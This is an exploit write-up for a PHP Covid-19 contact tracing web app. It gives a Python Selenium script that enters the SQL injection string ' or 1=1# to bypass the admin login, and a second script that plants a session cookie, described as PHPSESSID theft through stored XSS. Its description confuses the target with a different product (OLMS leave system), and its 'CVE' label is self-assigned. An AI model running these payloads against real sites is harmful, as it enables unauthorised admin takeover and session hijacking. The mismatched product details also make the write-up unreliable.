### Exploit Title: Covid-19 Contact Tracing System Web App with QR Code Scanning CTS-QR (by: oretnom23 ) v1.0 remote SQL-Injection-Bypass-Authentication in /cts_qr/classes/Login.php + XSS-Stored PWNED PHPSESSID Vulnerable parameter "code" in applicatoin State/Province List. ### Author: nu11secur1ty ### Testing and Debugging: nu11secur1ty ### Date: 09.01.2021 ### Vendor: https://www.sourcecodester.com/user/257130/activity ### Link: https://www.sourcecodester.com/php/14728/covid-19-contact-tracing-system-web-app-qr-code-scanning-using-php-source-code.html ### CVE: CVE-nu11-04 [+] Exploit Source: #!/usr/bin/python3 # Author: @nu11secur1ty # Debug and Developement: @nu11secur1ty # CVE-nu11-04 from selenium import webdriver import time #enter the link to the website you want to automate login. website_link="http://localhost/cts_qr/admin/login.php" #enter your login username username="nu11secur1ty' or 1=1#" #enter your login password password="nu11secur1ty' or 1=1#" #enter the element for username input field element_for_username="username" #enter the element for password input field element_for_password="password" browser = webdriver.Chrome() browser.get((website_link)) try: username_element = browser.find_element_by_name(element_for_username) username_element.send_keys(username) password_element = browser.find_element_by_name(element_for_password) password_element.send_keys(password) browser.maximize_window() time.sleep(1) browser.execute_script("document.querySelector('[class=\"btn btn-primary btn-block\"]').click()") print("The payload for CVE-nu11-04 is deployed...\n") except Exception: #### This exception occurs if the element are not found in the webpage. print("Some error occured :(") [+] PWNED PHPSESSID #!/usr/bin/python # @nu11secur1ty import time from selenium import webdriver driver = webdriver.Chrome() driver.maximize_window() driver.get("http://localhost/cts_qr/admin/login.php") driver.add_cookie({'name': 'PHPSESSID', 'value': '9flj0am7gv7cp3to8ujurvn1rs'}) print(driver.get_cookie('PHPSESSID')) driver.get("http://localhost/cts_qr/admin/login.php") time.sleep(3) print("Your PHPSESSID is PWNED") ------------------------------------------------------------------ ### Remote vulnerable link execution: http://localhost/cts_qr/admin/login.php ### Description: The OLMS - PHP (by: oretnom23 ) v1.0 in the application /leave_system/classes/Login.php from SQL-Injection-Bypass-Authentication m0re info: https://portswigger.net/support/using-sql-injection-to-bypass-authentication. The parameter (username) from the login form is not protected correctly and there is no security and escaping from malicious payloads. When the user will sending a malicious query or malicious payload to the MySQL server he can bypass the login credentials and take control of the administer account. ------------------------------------------------------------------ ### Description PWNED PHPSESSID: When the malicious user takes control of the administer account, by using the remote-MySQL-Injection-Authentication, then he can perform an XSS Stored attack, for stealing PHPSESSID information and get another login by using another malicious software! - Conclusion: This software must be DEPRECATED EMIDIATLY!!! ### Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-04/XSS ### Proof: https://streamable.com/luf1bw ### BR nu11secur1ty